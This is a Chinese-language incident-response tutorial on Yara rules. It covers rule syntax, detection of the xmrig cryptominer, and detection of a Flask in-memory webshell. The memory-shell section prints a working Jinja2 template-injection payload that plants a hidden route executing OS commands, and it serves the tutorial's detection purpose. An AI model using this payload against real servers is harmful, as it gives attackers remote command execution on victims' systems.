Yara規則介紹

Yara是一個基于規則的惡意樣本分析工具，可以幫助安全研究人員和藍隊分析惡意軟件，并且可以在應急取證過程中自定義檢測規則來檢測惡意軟件，Yara支持有木馬文件落盤和無木馬文件落盤(內存馬)的檢測，由一組字符串和一個確定的布爾表達式組成。

下載安裝

Windows環境下可直接下載編譯好的exe程序進行檢測分析，當前使用的版本為4.1.3。

程序運行截圖

2.Yara檢測程序運行中使用的參數。

運行參數

下載地址：https://github.com/VirusTotal/yara

需要更多學習資料與工具可以私信回復“資料”【點擊查看】

Yara規則語法

1.Yara規則內容支持字符串、正則表達式、十六進制進行匹配。

字符串：定義一個變量 $a = “字符串內容”

正則表達式：定義一個變量 $a = /正則表達式內容/

十六進制：定義一個變量 $a = {十六進制內容}

2.Yara規則條件

and：與 or：或 not：非

all of them：所有條件匹配即告警

any of them：有一個條件匹配即告警

$a and $b and $c：abc同時匹配即告警

($a and $b) or $c：匹配a和b或c即告警

3．Yara規則常用修飾符

nocase：不區分大小寫

base64：base64字符串

xor：異或字符串

wide：寬字符

4.下面是一條Yara規則的demo。

yara規則demo

惡意程序檢測案例

1、挖礦程序檢測

1、下載xmrig挖礦程序，https://github.com/xmrig/xmrig/

2、編寫xmrig挖礦程序檢測規則，利用010 Editor、die等PE文件編輯工具進行特征的提取。此規則使用PE文件的文件頭4D 5A、挖礦程序專用協議stratum、xmrig挖礦的程序的名稱、礦池域名xx.pool.xx等特征進行關聯匹配。

xmrig挖礦程序檢測規則

3、xmrig挖礦程序掃描，利用-r參數對目錄下的文件進行遞歸掃描，可發現利用檢測規則掃描出xmrig.exe挖礦程序。

挖礦程序掃描

2、 無文件檢測-python flask內存馬

1.命令行運行python flask內存馬腳本。

內存馬腳本

2.瀏覽器訪問執行payload，完成內存馬的注入。

http://172.16.120.115:5000/test?param={{url_for.globals[‘builtins’][‘eval’](“app.add_url_rule(’/shell1’, ‘shell’, lambda :import(‘os’).popen(_request_ctx_stack.top.request.values.get(‘cmd’, ‘whoami’)).read())”,{’_request_ctx_stack’:url_for.globals[’_request_ctx_stack’],‘app’:url_for.globals[‘current_app’]})}}

3.查看命令執行的效果。

whoami命令執行

4.利用procdump.exe dump內存。

procdump dump內存命令

5.檢測內存中的明文特征，如payload中的_request_ctx_stack、exec|eval、url_for.globals、add_url_rule、import(‘os’).popen等函數在內存中全部明文顯示，利用此特征編寫檢測規則。

python flask內存馬檢測規則

6.利用python flask內存馬檢測規則掃描出python.exe進程中被注入內存馬。

python flask內存馬檢測

總結

以上是生活随笔為你收集整理的应急响应-Yara规则木马检测的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。